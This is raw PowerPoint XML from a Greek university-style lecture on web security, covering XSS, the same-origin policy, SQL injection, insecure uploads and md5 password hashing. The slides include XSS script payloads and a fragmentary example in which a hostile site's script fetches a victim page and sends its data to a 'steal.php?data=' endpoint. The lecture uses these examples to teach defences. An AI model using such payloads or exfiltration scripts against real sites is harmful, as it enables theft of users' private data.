              <a:t>;&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>gt;alert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>( ‘XSS’ );&lt;/script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ziz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27984" y="4293096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1760" y="5016607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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>diony</a:t>
            </a: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”&gt;alert( ‘XSS’ );&gt;&lt;/script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ziz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578672" y="1862969"/>
            <a:ext cx="360040" cy="7403484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0320" y="590863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B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Δεν εκτελείται, απλώς εμφανίζεται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Υπάρχουν εμπιστευτικές πληροφορίες που έχει κανείς πρόσβαση μόνο με μπισκότα</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>Δίνοντας το μπισκότο μου στο </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>gmail.com </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>έχω πρόσβαση στα </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>e-mail </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>μου.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>Όταν ο </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>browser </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>«ζητάει» μία σελίδα, στέλνει τα αντίστοιχα μπισκότα μαζί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Μία ερώτηση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Ποτέ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>δεν υπάρχει απόλυτη ασφάλεια</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>Η </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" b="1" dirty="0" smtClean="0"/>
              <a:t>τεράστια</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t> ασφάλεια είναι υπερβολικά </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" b="1" dirty="0" smtClean="0"/>
              <a:t>ακριβή</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>Σε χρόνο και σε χρήμα</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>Θεωρούμε </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" b="1" dirty="0" smtClean="0"/>
              <a:t>δεδομένο </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>ότι υπάρχουν προβλήματα ασφαλείας</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>Πώς μπορούμε να ελαχιστοποιήσουμε </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" b="1" dirty="0" smtClean="0"/>
              <a:t>το κόστος</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>σε περίπτωση παραβίασης;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75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Τι γίνεται αν όταν ο διαχειριστής του </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>kokkinoskoufitsa.gr </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>επισκεφθεί το </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>kakoslykos.gr </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>όπου θα τρέξει κάτι σαν κι αυτό;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&lt;script type=“text/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get(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“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http://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kokkinoskoufitsa.gr/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email.php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function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data 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img.src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 ‘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steal.php?data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=’ + data;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document.appendChild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}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&lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="el-GR" sz="26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l-GR" dirty="0" smtClean="0"/>
              <a:t>Οι </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>browsers </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>το απαγορεύουν αυτό</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="el-GR" b="1" dirty="0" smtClean="0"/>
              <a:t>Επιτρέπεται </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>να γίνουν </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>embed </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>εικόνες από άλλες σελίδες</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="el-GR" b="1" dirty="0" smtClean="0"/>
              <a:t>Επιτρέπεται </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>να γίνουν </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>embed </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>ήχοι, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>video, scripts</a:t>
            </a:r>
            <a:endParaRPr lang="el-GR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>Αυτό το </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>embed </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>γίνεται με τα </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" b="1" dirty="0" smtClean="0"/>
              <a:t>ορθά </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>cookies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="el-GR" b="1" dirty="0" smtClean="0"/>
              <a:t>Δεν </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>επιτρέπεται </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" b="1" dirty="0" smtClean="0"/>
              <a:t>η ανάγνωση</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t> των καθεαυτών δεδομένων</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>Διότι αυτά μπορεί να είναι εμπιστευτικά</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="el-GR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>«Άλλες σελίδες» σημαίνει:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>Διαφορετικό </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>domain, subdomain</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>http VS https</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>Διαφορετική </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>TCP/IP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>θύρα</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>(παράδειγμα)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8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Τυπικά προβλήματα ασφαλείας στο </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>και γενικά</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>SQL injections</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>XSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="el-GR" dirty="0"/>
              <a:t>Ανασφαλές ανέβασμα αρχείων</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="el-GR" dirty="0"/>
              <a:t>Εκτελέσιμα </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>inc</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="el-GR" dirty="0"/>
              <a:t>Κωδικοί και </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>md5</a:t>
            </a:r>
            <a:endParaRPr lang="el-GR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>Κατάλληλες λύσεις</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Ad hoc</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>Ορθή αρχιτεκτονική</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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41095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26692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Μπορείτε να </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" b="1" dirty="0" smtClean="0"/>
              <a:t>χακάρετε την τράπεζα σας</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>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26692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Μπορείτε να </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" b="1" dirty="0" smtClean="0"/>
              <a:t>κάνετε ασφαλή την σελίδα σας</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>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Συναρτησιακός προγραμματισμός σε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l-GR" dirty="0" smtClean="0"/>
              <a:t>Μία προσπάθεια μείωσης των πονοκεφάλων όταν βλέπετε «περίεργο» κώδικα</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4814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Αποθηκευμένοι κωδικοί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Έστω ότι κάποιος </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" b="1" dirty="0" smtClean="0"/>
              <a:t>παραβιάζει</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t> την βάση δεδομένων μας</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>Αν οι κωδικοί των χρηστών είναι σε απλό κείμενο αποκτά πρόσβαση σε αυτούς</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>Μήπως να τους αποθηκεύαμε αλλιώς;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607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/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>Συνάρτηση</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>Πεδίο ορισμού: όλα τα αλφαριθμητικά</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>Πεδίο τιμών: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>32</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>ψήφιοι δεκαεξαδικοί αριθμοί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2555776" y="3629230"/>
            <a:ext cx="900100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md5</a:t>
            </a:r>
            <a:endParaRPr lang="el-GR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17694" y="3917262"/>
            <a:ext cx="73808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7926" y="37325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hello</a:t>
            </a:r>
            <a:endParaRPr lang="el-GR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5876" y="3917262"/>
            <a:ext cx="73808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3968" y="37797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5d41402abc4b2a76b9719d911017c592</a:t>
            </a:r>
            <a:endParaRPr lang="el-GR" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Rectangle 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2555776" y="4509120"/>
            <a:ext cx="900100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md5</a:t>
            </a:r>
            <a:endParaRPr lang="el-GR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17694" y="4797152"/>
            <a:ext cx="73808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4612486"/>
            <a:ext cx="15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/>
              <a:t>liroulirou</a:t>
            </a:r>
            <a:endParaRPr lang="el-GR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55876" y="4797152"/>
            <a:ext cx="73808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3968" y="465963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332500b1c7380a16247bbde002f28696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6211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3208</TotalTime>
  <Words>2479</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>701</Paragraphs>
  <Slides>75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Clarity</vt:lpstr>
      <vt:lpstr>Ασφαλεια</vt:lpstr>
      <vt:lpstr>Στόχος της ώρας</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>HTTPS</vt:lpstr>
      <vt:lpstr>HTTPS</vt:lpstr>
      <vt:lpstr>Μία ερώτηση</vt:lpstr>
      <vt:lpstr>Αποθηκευμένοι κωδικοί</vt:lpstr>
      <vt:lpstr>md5</vt:lpstr>
      <vt:lpstr>md5</vt:lpstr>
      <vt:lpstr>md5</vt:lpstr>
      <vt:lpstr>Δημιουργία λογαριασμού</vt:lpstr>
      <vt:lpstr>Πιστοποίηση με md5</vt:lpstr>
      <vt:lpstr>Πιστοποίηση με md5</vt:lpstr>
      <vt:lpstr>Σπάσιμο md5</vt:lpstr>
      <vt:lpstr>Σπάσιμο md5</vt:lpstr>
      <vt:lpstr>Ανοιχτό ερώτημα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Αποφυγή SQL injection</vt:lpstr>
      <vt:lpstr>Αποφυγή SQL injection</vt:lpstr>
      <vt:lpstr>Αποφυγή SQL injection</vt:lpstr>
      <vt:lpstr>Αποφυγή SQL Injection</vt:lpstr>
      <vt:lpstr>Αποφυγή SQL Injection</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Ποιο είναι το βαθύτερο πρόβλημα;</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Πώς διαχωρίζουμε εντολές/δεδομένα;</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>«Προετοιμασμένα» ερωτήματα</vt:lpstr>
      <vt:lpstr>Ανασφαλές ανέβασμα αρχείων</vt:lpstr>
      <vt:lpstr>Μαύρη λίστα</vt:lpstr>
      <vt:lpstr>Άσπρη λίστα</vt:lpstr>
      <vt:lpstr>Άσπρη λίστα &gt; Μαύρη λίστα</vt:lpstr>
      <vt:lpstr>Γρίφος SQL</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Γρίφος SQL</vt:lpstr>
      <vt:lpstr>Γρίφος SQL</vt:lpstr>
      <vt:lpstr>Γρίφος SQL</vt:lpstr>
      <vt:lpstr>Γρίφος SQL</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Γρίφος SQL</vt:lpstr>
      <vt:lpstr>Ανασφαλές include</vt:lpstr>
      <vt:lpstr>Ανασφαλές include</vt:lpstr>
      <vt:lpstr>XSS</vt:lpstr>
      <vt:lpstr>Βασική αρχή ασφαλείας του web</vt:lpstr>
      <vt:lpstr>2 σελίδες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Αποφυγή XSS</vt:lpstr>
      <vt:lpstr>Αποφυγή XSS</vt:lpstr>
      <vt:lpstr>Αποφυγή XSS</vt:lpstr>
      <vt:lpstr>XSS</vt:lpstr>
      <vt:lpstr>Same-origin policy</vt:lpstr>
      <vt:lpstr>Same-origin policy</vt:lpstr>
      <vt:lpstr>Same-origin policy</vt:lpstr>
      <vt:lpstr>Μάθαμε</vt:lpstr>
      <vt:lpstr>Συγχαρητήρια!</vt:lpstr>
      <vt:lpstr>Συγχαρητήρια!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dc:creator>Dionysis Zindros</dc:creator>
  <cp:lastModifiedBy>dionyziz</cp:lastModifiedBy>
  <cp:revision>245</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2010-08-21T11:02:20Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2011-01-14T21:00:55Z</dcterms:modified>
</cp:coreProperties>
</file>